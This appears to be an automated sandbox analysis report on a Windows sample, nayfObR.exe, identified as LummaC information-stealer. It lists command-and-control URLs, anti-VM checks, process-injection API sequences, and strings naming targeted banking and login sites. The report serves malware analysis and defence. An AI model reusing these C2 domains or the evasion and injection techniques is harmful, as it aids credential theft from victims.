Source: nayfObR.exe, 00000003.00000003.2183649716.0000000003135000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/I
Source: nayfObR.exe, 00000003.00000003.2223148388.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226400428.00000000030C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/Jk
Source: nayfObR.exe, 00000003.00000003.2064489964.0000000005928000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/ak
Source: nayfObR.exe, nayfObR.exe, 00000003.00000003.2210535065.0000000003120000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051055223.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2192173984.000000000592B000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2210657402.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2075834221.0000000005944000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2102111658.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183649716.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2223324623.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2194674764.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226668754.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2194674764.0000000003120000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2075511997.0000000005943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/api
Source: nayfObR.exe, 00000003.00000003.2051055223.00000000030C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/api7
Source: nayfObR.exe, 00000003.00000003.2210657402.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183649716.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2223324623.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2194674764.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226668754.000000000312C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apiJ
Source: nayfObR.exe, 00000003.00000003.2075834221.0000000005944000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2075511997.0000000005943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apiR3oR
Source: nayfObR.exe, 00000003.00000003.2194674764.0000000003135000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apink
Source: nayfObR.exe, 00000003.00000003.2064489964.0000000005928000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apiok
Source: nayfObR.exe, 00000003.00000003.2223324623.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226668754.000000000312C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apirV
Source: nayfObR.exe, 00000003.00000003.2210657402.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2194674764.0000000003135000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/i
Source: nayfObR.exe, nayfObR.exe, 00000003.00000003.2223148388.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2210391409.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183544269.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226400428.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2101907540.00000000030A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop:443/api
Source: nayfObR.exe, 00000003.00000003.2051055223.00000000030A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop:443/api9
Source: nayfObR.exe, 00000003.00000002.2226400428.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2101907540.00000000030A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop:443/apiMicrosoft
Source: nayfObR.exe, 00000003.00000003.2051055223.00000000030A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop:443/apis
Source: nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: nayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: nayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: nayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: nayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: nayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: nayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: nayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: nayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49716 version: TLS 1.2

Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 0_2_005B3010	0_2_005B3010
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 0_2_005C00A2	0_2_005C00A2
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 0_2_005AD9B2	0_2_005AD9B2
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 0_2_005A92AB	0_2_005A92AB
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 0_2_005BE38E	0_2_005BE38E
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_031087B8	3_3_031087B8
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_031087B8	3_3_031087B8
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_031087B8	3_3_031087B8
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_031087B8	3_3_031087B8

Source: C:\Users\user\Desktop\nayfObR.exe

Code function: String function: 005A97C0 appears 47 times

Source: nayfObR.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: nayfObR.exe

Static PE information: Section: .BSS ZLIB complexity 1.0003366411102483

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/0@1/1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5536:120:WilError_03

Source: C:\Users\user\Desktop\nayfObR.exe

Command line argument: M[

0_2_005B4D40

Source: nayfObR.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\nayfObR.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: nayfObR.exe, 00000003.00000003.2052125929.00000000058BA000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2052013928.00000000058D6000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: nayfObR.exe	Virustotal: Detection: 44%
Source: nayfObR.exe	ReversingLabs: Detection: 39%

Source: C:\Users\user\Desktop\nayfObR.exe

File read: C:\Users\user\Desktop\nayfObR.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\nayfObR.exe "C:\Users\user\Desktop\nayfObR.exe"
Source: C:\Users\user\Desktop\nayfObR.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\nayfObR.exe	Process created: C:\Users\user\Desktop\nayfObR.exe "C:\Users\user\Desktop\nayfObR.exe"
Source: C:\Users\user\Desktop\nayfObR.exe	Process created: C:\Users\user\Desktop\nayfObR.exe "C:\Users\user\Desktop\nayfObR.exe"	Jump to behavior

Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: nayfObR.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: nayfObR.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: nayfObR.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: nayfObR.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: nayfObR.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 0_2_005A997A push ecx; ret	0_2_005A998D
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_0311CFFB push A0800095h; iretd	3_3_0311D001
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_03139E13 pushad ; retf	3_3_03139E21
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_03139E13 pushad ; retf	3_3_03139E21
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_03137383 pushad ; retf	3_3_03137385
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_03137383 pushad ; retf	3_3_03137385
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_0310708C push esi; retf	3_3_0310708F
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_0310708C push esi; retf	3_3_0310708F
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_031053EF push esi; retf	3_3_031053F2
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_031053EF push esi; retf	3_3_031053F2
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_030ACF5C push 68030ACFh; iretd	3_3_030ACF6D
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_03139E13 pushad ; retf	3_3_03139E21
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_03139E13 pushad ; retf	3_3_03139E21
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_03137383 pushad ; retf	3_3_03137385
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_03137383 pushad ; retf	3_3_03137385
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_0310708C push esi; retf	3_3_0310708F
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_0310708C push esi; retf	3_3_0310708F
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_031053EF push esi; retf	3_3_031053F2
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 3_3_031053EF push esi; retf	3_3_031053F2

Source: C:\Users\user\Desktop\nayfObR.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\nayfObR.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\nayfObR.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\nayfObR.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\nayfObR.exe TID: 6156

Thread sleep time: -180000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\nayfObR.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 0_2_005BB099 FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_005BB099
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 0_2_005BAFE8 FindFirstFileExW,		0_2_005BAFE8

Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: nayfObR.exe, 00000003.00000003.2064969547.0000000005954000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: nayfObR.exe, nayfObR.exe, 00000003.00000003.2210391409.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2102040134.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051055223.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2223148388.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2220700165.000000000308C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226400428.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183544269.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226400428.000000000308C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: nayfObR.exe, 00000003.00000003.2064969547.0000000005954000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\nayfObR.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\nayfObR.exe

Code function: 0_2_005A9643 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_005A9643

Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 0_2_005D019E mov edi, dword ptr fs:[00000030h]		0_2_005D019E
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 0_2_005A1C80 mov edi, dword ptr fs:[00000030h]		0_2_005A1C80

Source: C:\Users\user\Desktop\nayfObR.exe

Code function: 0_2_005B6920 GetProcessHeap,

0_2_005B6920

Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 0_2_005A9283 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_005A9283
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 0_2_005A9643 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_005A9643
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 0_2_005B1630 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_005B1630
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 0_2_005A9637 SetUnhandledExceptionFilter,	0_2_005A9637

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\nayfObR.exe

Code function: 0_2_005D019E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_005D019E

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\nayfObR.exe

Memory written: C:\Users\user\Desktop\nayfObR.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: nayfObR.exe, 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
